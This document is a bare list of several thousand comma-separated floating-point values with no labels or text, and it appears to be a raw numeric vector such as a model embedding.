0.017879286780953407, -0.00024631607811897993, 0.02292722463607788, 0.0035832601133733988, 0.0016347633209079504, -0.025592196732759476, 0.03897346183657646, 0.012556391768157482, -0.00019762568990699947, -0.00048514132504351437, -0.028877586126327515, 0.0185984056442976, -0.020121248438954353, -0.023040026426315308, 0.010342631489038467, -0.00737450085580349, -0.00704314187169075, 0.016821758821606636, 0.018950916826725006, 0.00979271624237299, 0.007021991070359945, 0.017498577013611794, -0.003729551564902067, -0.016074437648057938, -0.007614207454025745, -0.007480253465473652, -0.004794130567461252, 0.038776054978370667, -0.03457413986325264, -0.017230669036507607, -0.012633943930268288, 0.026071609929203987, 0.00917934998869896, 0.006873937323689461, 0.0015677864430472255, -0.004843481816351414, 0.004557949025183916, -0.009320354089140892, -0.03970668092370033, 0.03155665844678879, 0.0017810547724366188, -0.025789601728320122, -0.025197386741638184, -0.025987006723880768, -0.01211928017437458, 0.007473203353583813, 0.02456286922097206, 0.0096235116943717, 0.014946406707167625, -0.0008640891755931079, 0.017569078132510185, -0.01907781884074211, -0.029554404318332672, 0.011675117537379265, -0.005841083824634552, 0.00314438552595675, 0.0031637735664844513, 0.0031637735664844513, 0.013212059624493122, -0.049746155738830566, -0.018795812502503395, 0.023646343499422073, 0.011893673799932003, -0.01943032816052437, -0.015313017182052135, -0.018203595653176308, -0.03843764588236809, 0.005678929854184389, -0.008551882579922676, 0.02440776489675045, 0.011273256503045559, 0.013402414508163929, 0.006507327314466238, 0.030174821615219116, -0.0048646326176822186, -0.017512677237391472, 0.010011272504925728, 0.03130285069346428, -0.01672305539250374, 0.005255918018519878, -0.03178226575255394, -0.010540037415921688, 0.0017960363766178489, -0.021037772297859192, 0.002726661739870906, 0.013839527033269405, 0.008340377360582352, -0.0072123464196920395, 0.002575082704424858, -0.0018947391072288156, 0.008509581908583641, -0.0029681308660656214, -0.034207530319690704, -0.03276929259300232, 0.023040026426315308, 0.008058369159698486, 0.005908060818910599, 0.00031020844471640885, 0.010504785925149918, 0.012154530733823776, 0.00896784383803606, 0.005322895012795925, -0.013374214060604572, -0.01883811317384243, 0.02007894590497017, -0.05070498213171959, -0.026762528344988823, 0.01613083854317665, 0.01711786538362503, 0.027820058166980743, -0.013987581245601177, 0.012824298813939095, -0.0012232082663103938, 0.011118153110146523, -0.01876761019229889, -0.018316399306058884, -0.030118420720100403, -0.035758573561906815, 0.003170823911204934, 0.010455435141921043, -0.010194577276706696, -0.009059496223926544, 0.03350251168012619, -0.02686123177409172, 0.0027901134453713894, 0.009609411470592022, -0.008657636120915413, -0.001989916665479541, 0.005287643987685442, -0.020332753658294678, -0.00917934998869896, -0.012626893818378448, 0.018824012950062752, -0.03446133807301521, -0.03516635671257973, -0.027664953842759132, -0.029441602528095245, -0.0031285227742046118, 0.012796098366379738, 0.0015060972655192018, 0.005432173144072294, -0.009722215123474598, 0.04830791428685188, 0.02202479913830757, -0.011449512094259262, -0.02941340021789074, 0.001362449605949223, -0.02112237550318241, 0.010617588646709919, 0.050310168415308, -0.014875904656946659, 0.028468675911426544, -0.014114484190940857, 0.014890005812048912, -0.006017338950186968, -0.03023122251033783, -0.0048540569841861725, 0.003955157473683357, -0.01613083854317665, 0.01686405949294567, -0.029272397980093956, -0.01745627447962761, 0.011393110267817974, -0.0072405473329126835, -0.021841494366526604, -0.013945279642939568, -0.006038489285856485, -0.038945261389017105, 0.020050745457410812, 0.012478839606046677, -0.007155945058912039, 0.0101593267172575, 0.02440776489675045, -0.008269875310361385, 0.03671739995479584, -0.01388182770460844, 0.008883241564035416, -0.0022983625531196594, -0.00248871766962111, 0.02505638264119625, 0.01077269297093153, 0.0268753319978714, 0.020191749557852745, 0.010963048785924911, 0.02146078459918499, 0.018965017050504684, 0.0365481935441494, -0.02227860689163208, -0.022306807339191437, -0.01028622966259718, -0.003673149971291423, 0.004279466345906258, 0.01761137880384922, -0.024351362138986588, 0.0018947391072288156, 0.01868300884962082, -0.004335868172347546, 0.018457403406500816, -0.013049905188381672, 0.002384727355092764, 0.00851663202047348, -0.01327551156282425, -0.006521427538245916, 0.029610807076096535, -0.022884923964738846, -0.0447264164686203, 0.018386900424957275, 0.04232935234904289, -0.01844330132007599, 0.003859980031847954, -0.0016770644579082727, -0.012062878347933292, 0.009510708972811699, 0.0008398541249334812, -0.02236320823431015, 0.03381272032856941, -0.025987006723880768, 0.028059763833880424, -0.0034528314135968685, 0.02924419566988945, -0.01420613657683134, -0.0012020576978102326, -0.0012672720476984978, 0.009531859308481216, -0.0245064664632082, 0.005418072454631329, 0.002925829729065299, -0.018795812502503395, 0.0034598817583173513, -0.0032342756167054176, -0.03217707574367523, -0.0033629415556788445, -0.0011086426675319672, -0.001601274823769927, -0.007159470114856958, -0.002985756378620863, -0.00023221569426823407, 0.008573033846914768, 0.024520568549633026, -0.0018965016352012753, -0.016497449949383736, 0.009870268404483795, -0.012725596316158772, 0.00042565533658489585, -0.0037859531585127115, 0.0021696966141462326, -0.018231796100735664, -0.012676245532929897, -0.01900731772184372, -0.007332199718803167, 0.007226446643471718, -0.039932288229465485, 0.026099810376763344, -0.0036907754838466644, -0.003740126732736826, -0.0001411139965057373, -0.004730678629130125, -0.012507040984928608, -0.016243642196059227, 0.0032342756167054176, -0.015482221730053425, -0.002085094340145588, -0.00753665529191494, 0.029018590226769447, 0.08093620091676712, 0.00020148126350250095, -0.01718836836516857, -0.012366036884486675, 0.0037648025900125504, -0.0015210788697004318, 0.011653967201709747, -0.019867440685629845, 0.004349968396127224, 0.002679073018953204, 0.01503100898116827, -0.008692886680364609, 0.010243928991258144, 0.020050745457410812, 0.014368291012942791, 0.007275797892361879, 0.01849970407783985, 0.008269875310361385, 0.013465866446495056, -0.020586561411619186, 0.019599534571170807, 0.006472076289355755, 0.006207693833857775, -0.018330499529838562, 0.015848832204937935, -0.026988135650753975, -0.009278052486479282, -0.011195705272257328, -0.04340098053216934, -0.033699918538331985, 0.01958543248474598, 0.030597833916544914, -0.013776075094938278, 0.007917365990579128, -0.0023706271313130856, 0.011238005943596363, 0.03254368528723717, -0.016821758821606636, 0.0012373087229207158, -0.0017387536354362965, -0.0037189761642366648, -0.016003936529159546, 0.004050335381180048, -0.010561187751591206, -0.002842989983037114, -0.013042855076491833, 0.016032136976718903, -0.006165392696857452, -0.006764659192413092, 0.004367594141513109, -0.012753797695040703, -0.011118153110146523, 0.027622651308774948, 0.010194577276706696, -0.006542578339576721, 0.002234910847619176, -0.005784682463854551, -0.02243371121585369, -0.02342073805630207, 0.002918779384344816, 0.0022155228070914745, 0.023618143051862717, -0.012873650528490543, -0.0002934642543550581, -0.00014507972809951752, -0.0006605148664675653, -0.018725309520959854, 0.009940770454704762, -0.028525076806545258, 0.007642407901585102, -0.003368229139596224, 0.002747812308371067, -0.00880568940192461, -0.004889308009296656, -0.0179497878998518, 0.029187794774770737, -0.012429488822817802, 0.03186686709523201, -0.008594184182584286, -0.018556104972958565, 0.02972360886633396, 0.052368827164173126, -0.019120121374726295, 0.016582051292061806, -0.0023441887460649014, 0.030738836154341698, -0.01126620639115572, -0.0028711906634271145, 0.02556399628520012, 0.005255918018519878, -0.02442186512053013, -0.0021696966141462326, 0.022461911663413048, 0.012020577676594257, 0.02481667511165142, 0.027890559285879135, 0.00819232314825058, 0.0050655631348490715, -0.011865473352372646, -0.0032289880327880383, -0.007053717039525509, -0.01162576675415039, 0.01630004309117794, -0.0011888386216014624, -0.016018036752939224, 0.009412006475031376, -0.0062288446351885796, 0.028214868158102036, -0.000722204043995589, -0.015313017182052135, -0.04619285836815834, -0.0189227145165205, 0.021686390042304993, -0.02392835170030594, -0.005051462445408106, 0.019106021150946617, 0.011153403669595718, -0.01883811317384243, -0.014396492391824722, -0.007663558702915907, -0.015947533771395683, -0.026339517906308174, 0.04117312282323837, -0.01113930344581604, -0.002078043995425105, 0.01191482413560152, -0.004208964761346579, -0.024027055129408836, 0.041398726403713226, 0.01110405195504427, 0.03457413986325264, -0.0022384359035640955, 0.021897897124290466, -0.029780011624097824, -0.0006455332040786743, -0.037055809050798416, 0.012436538934707642, -0.0009738077642396092, -0.01257049199193716, 0.007318099495023489, -0.010532986372709274, 0.03062603436410427, 0.0034598817583173513, 0.007642407901585102, 0.0002868546871468425, -0.011935975402593613, 0.007593056652694941, 0.003068596124649048, 0.016835859045386314, 0.005883385427296162, -0.008001968264579773, -0.023815548047423363, 0.006598979700356722, 0.014297788962721825, -0.00786096416413784, -0.00012701361265499145, 0.02581780217587948, -0.03079523891210556, -0.005527350585907698, -0.0034669318702071905, -0.009306252934038639, -0.007578956428915262, 0.007917365990579128, 0.008009018376469612, -0.015510422177612782, 0.02088266797363758, 0.014015781693160534, -0.05135359987616539, -0.019867440685629845, -0.017808785662055016, 0.02907499112188816, 0.015425819903612137, -0.01735757291316986, 0.012662144377827644, -0.0037330766208469868, 0.01372672338038683, -0.0023953027557581663, 0.01522841490805149, 0.006211219355463982, -0.019881540909409523, 0.013000554405152798, 0.04004509001970291, 0.014763101935386658, 0.00589748565107584, 0.0024182158522307873, -0.026720227673649788, -0.018048491328954697, 0.0071841455064713955, -0.027566250413656235, 0.01338831428438425, -0.002315988065674901, 0.03353071212768555, -0.01437534112483263, -0.02236320823431015, -0.01672305539250374, -0.017554977908730507, 0.013860677368938923, -0.0061019412241876125, -0.007296948693692684, -0.0013765499461442232, 0.02047375775873661, -0.03824024274945259, 0.0020533683709800243, 0.005805833265185356, -0.016426946967840195, -0.024294961243867874, 0.009122948162257671, 0.023646343499422073, -0.008502531796693802, 0.003461644286289811, 0.012422438710927963, 0.025747301056981087, 0.005622528027743101, 0.012528191320598125, 0.004240690264850855, 0.011435410939157009, -0.025535795837640762, -0.02284262143075466, 0.009320354089140892, 0.0046531264670193195, -0.008890291675925255, 0.01142836082726717, 0.008072469383478165, 0.0022313857916742563, -0.030654234811663628, -0.007797512225806713, 0.03192326799035072, -0.015383519232273102, -0.009200500324368477, 0.02270161733031273, -0.0182740967720747, 0.01146361231803894, -0.005174840800464153, 0.005389871541410685, 0.010272129438817501, -0.023307934403419495, 0.0026191463693976402, 0.024633370339870453, -0.00442047044634819, -0.0015977497678250074, 0.006976164877414703, 0.016990963369607925, -0.011668067425489426, -0.014734901487827301, 0.002701986115425825, -0.00016556934861000627, 0.030823439359664917, -0.006433300208300352, -0.006997315678745508, 0.02335023507475853, -0.03054143115878105, -0.011350808665156364, -0.011167503893375397, -0.023068228736519814, 0.008051319047808647, 0.01645514741539955, -0.005527350585907698, 0.029751809313893318, 0.01885221339762211, -0.014192036353051662, 0.03668919950723648, -0.010370831936597824, -0.014079233631491661, 0.023293834179639816, -0.019796939566731453, 0.006154817529022694, -0.0041983891278505325, -0.008051319047808647, 0.024450065568089485, -0.0025186811108142138, -0.013501117937266827, -0.011703318916261196, 0.013381264172494411, -0.028355872258543968, 0.00245875446125865, -0.015707828104496002, 0.0030879841651767492, -0.0050373622216284275, 0.0004104533581994474, -0.003576209768652916, 0.016243642196059227, 0.061477672308683395, 0.001369499834254384, -0.008460230194032192, -0.010307380929589272, -0.00232303817756474, -0.022828521206974983, -0.0019705286249518394, 0.0013827189104631543, -0.0011624003527686, -0.0059644621796905994, 0.0035339086316525936, -0.013790175318717957, -0.034433137625455856, 0.01011702511459589, -0.006824585609138012, -0.014819503761827946, 0.015256615355610847, -0.030485030263662338, 0.008037218824028969, 0.02275802008807659, 0.04560064151883125, 0.0016118501080200076, 0.03316410258412361, -0.0018066116608679295, 0.013042855076491833, -0.008467280305922031, 0.013910029083490372, -0.003613223321735859, -0.0061477674171328545, -0.01178792119026184, -0.018386900424957275, -0.00314438552595675, -0.03319230303168297, 0.02532428875565529, -0.00380005338229239, 0.009235751815140247, 0.017005063593387604, -0.01175266969949007, -0.0027372371405363083, -0.016032136976718903, -0.01539761945605278, -0.04283696785569191, -0.020022545009851456, -0.02188379503786564, 0.007790462113916874, -0.005915110930800438, 0.005449798423796892, 0.01604623720049858, -0.0062887710519135, 0.008819790557026863, 0.015045109204947948, 0.019726436585187912, -0.01909191906452179, -0.0033647040836513042, -0.008227573707699776, 0.01228143461048603, 0.01582062989473343, -0.021644089370965958, -0.006849261466413736, -0.02399885281920433, 0.007452053017914295, -0.015989836305379868, -0.004501547664403915, -0.004240690264850855, -0.005195991601794958, -0.014607997611165047, 0.004656651988625526, 0.0017510914476588368, -0.028962189331650734, -0.012683295644819736, -0.015298916958272457, -0.016398746520280838, 0.007635357789695263, 0.0023336135782301426, 0.009863218292593956, 0.009447257034480572, -0.002666735090315342, 0.02941340021789074, -0.01811899244785309, 0.009553010575473309, 0.01114635355770588, -0.015016908757388592, -0.009806817397475243, 0.0021097699645906687, -0.0038247292395681143, -0.005199516657739878, 0.016821758821606636, -0.007416801992803812, -0.002770725404843688, -0.0036766750272363424, 0.01998024433851242, -0.0003456797276157886, 0.0037471770774573088, -0.0099478205665946, 0.00818527303636074, 0.015834731981158257, -0.011505912989377975, -0.025676799938082695, 0.0009782140841707587, 0.008051319047808647, -0.012034677900373936, -0.0008010780438780785, 0.0064015742391347885, -0.024027055129408836, 0.00995487067848444, -0.013691472820937634, -0.001459389692172408, -0.01631414331495762, 0.014354190789163113, 0.003979833330959082, 0.03556116670370102, 0.025606296956539154, 0.028962189331650734, 0.02237730845808983, 0.003498657839372754, 0.02023405022919178, 0.012147480621933937, 0.003255426185205579, -0.02406935580074787, 0.021333880722522736, -0.0031232349574565887, 0.0061759683303534985, 0.015665527433156967, 0.011357859708368778, 0.008558932691812515, 0.008396778255701065, -0.02759445086121559, 0.03361531347036362, -0.0031743489671498537, 0.00347221945412457, -0.009404956363141537, 0.0007244072039611638, 0.0016532699810341, -0.00704314187169075, 0.006486176513135433, -0.016990963369607925, 0.0099478205665946, -0.009094747714698315, 0.00884799100458622, -0.01359277032315731, 0.010857295244932175, -0.02554989606142044, -0.03392552211880684, -0.008622384630143642, -0.005287643987685442, -0.0002985315804835409, 0.0005485930596478283, -0.004765929654240608, -0.030372226610779762, -0.012196832336485386, 0.017597278580069542, -0.005090238526463509, -0.025253787636756897, 0.004413420334458351, -0.0019035518635064363, -0.03855045139789581, 0.004177238792181015, -0.015284815803170204, -0.004991536028683186, 0.021150575950741768, -0.0043816943652927876, -0.00786096416413784, -0.005809358321130276, -0.007656508591026068, 0.00042477407259866595, -0.01306400541216135, -0.01596163399517536, -0.009849118068814278, -0.008044268935918808, 0.009271002374589443, 0.014128584414720535, 0.026071609929203987, 0.014234337955713272, -0.02048785798251629, 0.007712909951806068, -0.001548398402519524, -0.004251265898346901, -0.011089951731264591, 0.004039760213345289, 0.008749288506805897, -0.004265366122126579, 0.02244781143963337, 0.001548398402519524, 0.010046523995697498, 0.012880700640380383, 0.0025821328163146973, 0.011844322085380554, 0.0034440187737345695, -0.017653681337833405, 0.012394237332046032, 0.0031302853021770716, -0.0016515074530616403, 0.006309921853244305, 0.005837558768689632, -0.02523968741297722, -0.007945566438138485, -0.016835859045386314, 0.0014999283012002707, -0.001168569317087531, 0.001123624388128519, 0.0024023528676480055, -0.005668354220688343, 0.005788207519799471, -0.021897897124290466, 0.025493493303656578, -0.006461501121520996, 0.0038176788948476315, 0.0011068801395595074, 0.007416801992803812, 0.025747301056981087, -0.01637054607272148, 0.004237165208905935, 0.011780871078372002, -0.010822044685482979, 0.014424692839384079, 0.014974608086049557, 0.0284968763589859, 0.001175619545392692, 0.008728137239813805, -0.015933433547616005, -0.01727296970784664, -0.0009632324799895287, 0.005989138036966324, -0.00884094089269638, -0.004935134202241898, -0.007032566703855991, -0.007318099495023489, 0.019063718616962433, -0.009820917621254921, -0.0033981925807893276, -0.024774374440312386, -0.0036449492909014225, -0.002820076886564493, 0.015623225830495358, -0.00019751553190872073, -0.02186969481408596, -0.010857295244932175, -0.02220810391008854, 0.004367594141513109, -0.01803439110517502, 0.007593056652694941, -0.004533273633569479, -0.014431742951273918, 0.010575287975370884, 0.009214600548148155, 0.014065133407711983, 0.007882114499807358, -0.010843195021152496, -0.0027301867958158255, 0.008629434742033482, 0.010173426941037178, -0.007275797892361879, 0.0032677638810127974, -0.005559076555073261, 0.02079806663095951, 0.013874777592718601, -0.001496403245255351, 0.0024834300857037306, -0.005932736676186323, 0.024689773097634315, -0.019303426146507263, 0.008826840668916702, 0.021841494366526604, 0.008417929522693157, -0.014170886017382145, 0.007088968064635992, 0.00530174421146512, 0.013691472820937634, 0.011816121637821198, 0.007226446643471718, -0.013902978971600533, 0.008657636120915413, -0.002724899211898446, -0.005982087925076485, -0.0018594880821183324, -0.012302584946155548, 0.008601234294474125, -0.008333327248692513, 0.006197118666023016, 0.006320497021079063, -0.0021027198527008295, 0.01943032816052437, 0.011907774023711681, 0.022588815540075302, 0.02057245932519436, -0.0010460722260177135, 0.01621544174849987, -0.0003388498444110155, -0.004515647888183594, 0.0071841455064713955, 0.009799767285585403, 0.01338831428438425, -0.012514091096818447, -0.02023405022919178, 0.0073110489174723625, -0.002583895344287157, -0.013677372597157955, 0.0015651426510885358, -0.006426250096410513, 0.010018322616815567, 0.0047553544864058495, -0.02367454394698143, 0.010758592747151852, 0.004804705735296011, -0.021488985046744347, 0.019388027489185333, -0.017301172018051147, -0.03728141635656357, -0.027411146089434624, 0.00431824242696166, 0.023392537608742714, -0.022574715316295624, 0.01727296970784664, -0.0005741500062867999, -0.01803439110517502, -0.0072052963078022, -0.026762528344988823, 0.00475182943046093, 0.012394237332046032, -0.004089111462235451, 0.019796939566731453, 0.009426106698811054, 0.0012152768904343247, 0.00913704838603735, 0.02326563373208046, 0.03623798489570618, -0.0033858546521514654, -0.0008702580817043781, -0.017498577013611794, -0.0019828665535897017, -0.000491310260258615, 0.008622384630143642, 0.007360400632023811, 0.01653975062072277, -0.01810489222407341, 0.002257823944091797, 0.01761137880384922, -0.007254647556692362, -0.037309616804122925, 0.001504334737546742, 0.013240260072052479, -0.035673972219228745, -0.003546246560290456, 0.007233496755361557, -0.0008068063179962337, 0.008234623819589615, -0.02292722463607788, 0.002913491800427437, -0.004290041979402304, -0.002153833629563451, 0.02023405022919178, -0.0028394649270921946, 0.006521427538245916, -0.004307667259126902, 0.02326563373208046, -0.0206429623067379, 0.0012716783676296473, -0.00019718505791388452, -0.010596438311040401, -0.00014045304851606488, -0.021488985046744347, -0.01393117941915989, -0.004219539929181337, -0.0185984056442976, 0.002830652054399252, 0.013014654628932476, -0.0032448507845401764, -0.0071383193135261536, 0.0013536368496716022, 0.006341647822409868, 0.0005129014607518911, -0.0017590229399502277, 0.007614207454025745, -0.004639026243239641, -0.021728692576289177, 0.010476585477590561, -0.001257578027434647, 0.007353350054472685, 0.011837271973490715, 0.04097571596503258, 0.020205849781632423, -0.01061053853482008, 0.005812883377075195, 0.024309061467647552, 0.025747301056981087, 0.0016197816003113985, 0.005086713470518589, 0.026974033564329147, -0.0013227922609075904, -0.011611666530370712, -0.00782571267336607, 0.0050091613084077835, -0.003814153838902712, -0.01744217425584793, -0.00562957813963294, 0.002828889526426792, -0.002592707984149456, -0.017343472689390182, -0.005016211420297623, 0.004268891178071499, -0.011646917089819908, 0.013360113836824894, -0.003149673342704773, -0.0013836001744493842, -0.01522841490805149, -0.005678929854184389, -0.010504785925149918, 0.005047937389463186, -0.0060737403109669685, 0.022560615092515945, -0.0037648025900125504, 0.012662144377827644, 0.007755211088806391, 0.013331913389265537, -0.029018590226769447, -0.013409465551376343, 0.016892259940505028, 0.018217695876955986, 0.009066547267138958, 0.015552723780274391, -0.028285369277000427, 0.01842920109629631, 0.006468551233410835, 0.0067012072540819645, 0.006817535497248173, -0.007769311778247356, -0.011273256503045559, 0.005703605245798826, -0.004557949025183916, 0.019134221598505974, -0.009694013744592667, -0.005150165408849716, 0.0056648291647434235, -0.0002562304143793881, 0.016849959269165993, 0.0004926321562379599, -0.011012399569153786, 0.029356999322772026, -0.0031919744797050953, -0.015552723780274391, 0.005354620981961489, 0.020657062530517578, -0.010215728543698788, 0.009912570007145405, 0.00710659334436059, -0.02162998914718628, -0.02367454394698143, -0.020008444786071777, 0.006521427538245916, 0.02368864417076111, 0.019514931365847588, 0.01943032816052437, 0.008770438842475414, -0.000027939138817600906, -0.01582062989473343, 0.006789335049688816, -0.006937388796359301, -0.01224618311971426, -0.01825999654829502, 0.039199069142341614, 0.001989916665479541, -0.0009002214064821601, -0.014121534302830696, -0.005340520292520523, 0.013367163948714733, 0.0024411289487034082, 0.009679913520812988, -0.03327690437436104, 0.020826267078518867, 0.0070396168157458305, 0.016032136976718903, -0.013945279642939568, 0.00041287686326541007, 0.0020375053863972425, -0.011858423240482807, -0.0038917060010135174, 0.001421494991518557, -0.006334597710520029, -0.010011272504925728, -0.0014294263673946261, -0.009905519895255566, 0.017977990210056305, 0.026663826778531075, -0.010857295244932175, -0.003038632683455944, 0.005650728940963745, -0.03711220994591713, -0.004057385493069887, 0.01094189751893282, 0.004307667259126902, 0.007875064387917519, 0.02890578657388687, -0.003225462744012475, -0.0067858099937438965, -0.004656651988625526, 0.020276352763175964, -0.024435965344309807, 0.004265366122126579, 0.008220523595809937, 0.03062603436410427, -0.011583465151488781, -0.0007120693917386234, -0.005594327114522457, 0.03716861084103584, -0.0059186359867453575, -0.0023477140348404646, 0.01245063915848732, -0.002553932135924697, -0.02621261402964592, -0.006338122766464949, -0.0026015208568423986, -0.0023547641467303038, 0.005615477915853262, -0.00001769432856235653, -0.0199943445622921, -0.01817539520561695, 0.014170886017382145, 0.011336708441376686, -0.0030809338204562664, -0.014340090565383434, -0.026720227673649788, -0.012499989941716194, -0.002983993850648403, 0.009412006475031376, 0.007529605180025101, -0.0013606870779767632, -0.012697395868599415, 0.008629434742033482, -0.007797512225806713, -0.028285369277000427, 0.01032148115336895, -0.038296643644571304, -0.0035391964484006166, 0.0066307056695222855, 0.013021704740822315, -0.015256615355610847, 0.014065133407711983, 0.023900151252746582, -0.007790462113916874, 0.009165249764919281, 0.008220523595809937, -0.01241538766771555, -0.028962189331650734, -0.020995471626520157, -0.009165249764919281, 0.014333040453493595, -0.010250979103147984, 0.01109700184315443, -0.006433300208300352, 0.0016321194125339389, -0.007071342319250107, -0.011999426409602165, -0.03561757132411003, -0.016441047191619873, 0.0021203451324254274, -0.0017898675287142396, -0.01343061588704586, -0.022574715316295624, 0.03417932987213135, -0.009567110799252987, -0.00900309532880783, 0.023138729855418205, 0.002523968694731593, -0.003789478214457631, -0.0057459063827991486, -0.008298075757920742, -0.0028465150389820337, -0.0032148875761777163, -0.020107148215174675, -0.01077974308282137, 0.02711503766477108, 0.008016068488359451, 0.013902978971600533, 0.03358711302280426, -0.014008731581270695, 0.010427233763039112, -0.042724162340164185, -0.0041173119097948074, -0.006560203619301319, -0.004698953125625849, -0.002562744775786996, 0.05301744490861893, -0.03888886049389839, -0.008587134070694447, -0.017103765159845352, -0.020995471626520157, 0.008417929522693157, -0.0055097248405218124, 0.004357018508017063, -0.01703326404094696, 0.01470670010894537, 0.010258029215037823, 0.01754087768495083, -0.006172443274408579, -0.008065419271588326, 0.008509581908583641, -0.024844877421855927, -0.024055255576968193, 0.01982514001429081, 0.013416515663266182, 0.0045262230560183525, -0.006870412267744541, -0.009553010575473309, -0.013860677368938923, -0.002116820076480508, -0.003828254295513034, 0.004878732841461897, -0.028877586126327515, -0.014065133407711983, -0.004173713736236095, 0.008608284406363964, -0.016116738319396973, 0.035194557160139084, 0.02556399628520012, 0.0008068063179962337, -0.003366466611623764, -0.0038071037270128727, 0.020417356863617897, 0.013423565775156021, 0.021968398243188858, -0.018527904525399208, 0.008283975534141064, 0.03381272032856941, -0.010349681600928307, 0.010095874778926373, 0.007194720674306154, -0.0039727832190692425, -0.01679355651140213, 0.021686390042304993, 0.011766770854592323, 0.02244781143963337, -0.020544258877635002, -0.005023261997848749, 0.014777202159166336, 0.019373927265405655, -0.02875068224966526, -0.02120697684586048, -0.020741663873195648, 0.0035391964484006166, 0.015679627656936646, 0.019796939566731453, -0.00007242970605148003, -0.003156723454594612, -0.0028359396383166313, -0.0035480090882629156, -0.007233496755361557, -0.005432173144072294, 0.01109700184315443, 0.007776361890137196, -0.004212489817291498, 0.008396778255701065, -0.002747812308371067, 0.020868567749857903, -0.03513815626502037, -0.0030033818911761045, 0.00037432112731039524, -0.016426946967840195, -0.010638739913702011, -0.015002808533608913, 0.008706986904144287, -0.0023406636901199818, 0.004878732841461897, -0.009595311246812344, 0.00023750333639327437, -0.00848138052970171, 0.013980531133711338, 0.0036907754838466644, -0.003054495668038726, 0.014396492391824722, -0.01811899244785309, 0.004688377492129803, -0.0010733917588368058, -0.008530732244253159, -0.01680765673518181, -0.006993790622800589, -0.016666654497385025, -0.0015448733465746045, 0.0144105926156044, -0.019514931365847588, -0.011280307546257973, -0.0216158889234066, 0.006010288838297129, -0.004519172944128513, 0.0067576090805232525, -0.012930052354931831, -0.01793568767607212, -0.02629721537232399, -0.00612309155985713, -0.0005234767450019717, -0.020755765959620476, -0.023124629631638527, 0.011872523464262486, -0.013197959400713444, -0.005386346485465765, 0.00038555735955014825, 0.00005513470387086272, -0.01900731772184372, 0.00819232314825058, -0.017752382904291153, 0.011414260603487492, -0.007959666661918163, -0.03220527619123459, -0.006436825264245272, -0.003789478214457631, -0.013860677368938923, -0.0021626465022563934, -0.005777632351964712, 0.009976021945476532, 0.005816408433020115, -0.006521427538245916, -0.017907487228512764, 0.0041278875432908535, -0.004579099826514721, 0.01809079200029373, -0.009059496223926544, -0.0024376038927584887, 0.002636771881952882, -0.006235894747078419, -0.01809079200029373, -0.01800619065761566, -0.006739983335137367, -0.01097009889781475, 0.0017863423563539982, -0.00557317677885294, -0.00409263651818037, -0.012217982672154903, 0.02342073805630207, -0.0012135142460465431, -0.006609554868191481, 0.027721354737877846, 0.027495749294757843, -0.002918779384344816, -0.007564856205135584, 0.01768188178539276, 0.000003893440862157149, -0.009419056586921215, 0.01680765673518181, -0.012753797695040703, -0.004388744477182627, 0.01573602855205536, 0.01359277032315731, -0.006591929588466883, -0.03432033583521843, -0.02284262143075466, -0.006017338950186968, -0.007734060753136873, -0.028144367039203644, -0.0009817392565310001, 0.0019564281683415174, 0.02318103052675724, -0.013007604517042637, -0.00769880972802639, 0.002375914715230465, 0.010681040585041046, -0.001071629230864346, -0.008291025646030903, 0.003743652021512389, -0.0008720206096768379, 0.015439920127391815, 0.0010927797993645072, -0.0037965283263474703, -0.03587137535214424, 0.013120407238602638, -0.0016462198691442609, -0.002444654004648328, -0.013606870546936989, 0.011456562206149101, 0.00737450085580349, 0.004963335115462542, -0.014523395337164402, 0.019359827041625977, -0.020290452986955643, -0.02614211104810238, -0.0022225729189813137, -0.016328245401382446, 0.02735474519431591, -0.0015889370115473866, -0.017230669036507607, -0.007071342319250107, 0.0021802717819809914, -0.009729265235364437, 0.013254361227154732, 0.0010892546270042658, 0.027735454961657524, -0.006662431638687849, -0.026325417682528496, -0.025267887860536575, -0.03333330899477005, 0.03454593941569328, -0.005643678829073906, 0.018133094534277916, -0.01761137880384922, -0.003380567068234086, 0.008869141340255737, -0.014734901487827301, 0.017103765159845352, -0.010540037415921688, 0.013444716110825539, -0.008932593278586864, -0.027904659509658813, 0.0020586559548974037, 0.0032801018096506596, 0.009968971833586693, 0.015693727880716324, 0.00022957187320571393, -0.0036766750272363424, 0.007198246195912361, 0.031190048903226852, 0.016102638095617294, -0.0070572420954704285, 0.01539761945605278, 0.0011932449415326118, 0.01356456894427538, 0.006979689933359623, 0.010659890249371529, -0.00687746237963438, 0.015834731981158257, -0.002055130898952484, -0.013014654628932476, 0.005834033712744713, -0.003500420367345214, 0.0008834771579131484, 0.0034686943981796503, 0.001907076919451356, 0.005396922118961811, 0.0049175089225173, 0.023124629631638527, 0.00027892322395928204, -0.01933162659406662, -0.012563441880047321, -0.007910314947366714, -0.013987581245601177, -0.022179903462529182, -0.0033506036270409822, -0.01672305539250374, -0.004635501187294722, -0.023124629631638527, 0.007180620450526476, -0.03733781725168228, -0.0014435268240049481, -0.016173141077160835, 0.03147205710411072, -0.0042547909542918205, -0.007275797892361879, -0.027241941541433334, 0.0069303386844694614, -0.01192187424749136, 0.016187241300940514, -0.01565142534673214, -0.003165536094456911, -0.02268751710653305, 0.0032924397382885218, 0.003181399079039693, 0.0122532332316041, -0.008220523595809937, 0.020360954105854034, -0.01589113287627697, -0.011992376297712326, -0.021517185494303703, 0.014523395337164402, -0.011294407770037651, -0.019345726817846298, -0.019867440685629845, -0.01950083114206791, 0.009729265235364437, 0.018979117274284363, -0.019232923164963722, -0.003884655889123678, -0.0027901134453713894, -0.03454593941569328, 0.006013813894242048, -0.016088537871837616, -0.0024605169892311096, -0.001027565449476242, 0.005485049448907375, -0.017512677237391472, 0.008206423372030258, 0.013747874647378922, -0.0036696249153465033, 0.0009288627770729363, 0.018866313621401787, -0.0002163527678931132, 0.005157215520739555, -0.008460230194032192, -0.015129712410271168, 0.007571906317025423, 0.019190622493624687, -0.014777202159166336, -0.000010368738912802655, -0.014276638627052307, -0.001244358834810555, -0.012556391768157482, 0.025352491065859795, 0.01359982043504715, 0.014636198990046978, -0.010525936260819435, -0.004924559034407139, -0.013994631357491016, -0.007959666661918163, -0.00896784383803606, -0.011252106167376041, -0.002479905029758811, -0.00540749728679657, -0.0032871519215404987, 0.0004371119139250368, 0.001870063366368413, -0.0023477140348404646, 0.018809912726283073, 0.03917086496949196, -0.0021115324925631285, -0.011534114368259907, 0.005576701834797859, 0.018880413845181465, 0.008135921321809292, -0.009404956363141537, -0.0132261598482728, -0.013804275542497635, 0.027918759733438492, 0.009694013744592667, 0.004758879542350769, -0.013536368496716022, -0.008890291675925255, -0.01638464629650116, -0.015115611255168915, -0.0020145922899246216, 0.0068563115783035755, 0.011872523464262486, 0.012464739382266998, -0.004906933754682541, 0.008742238394916058, 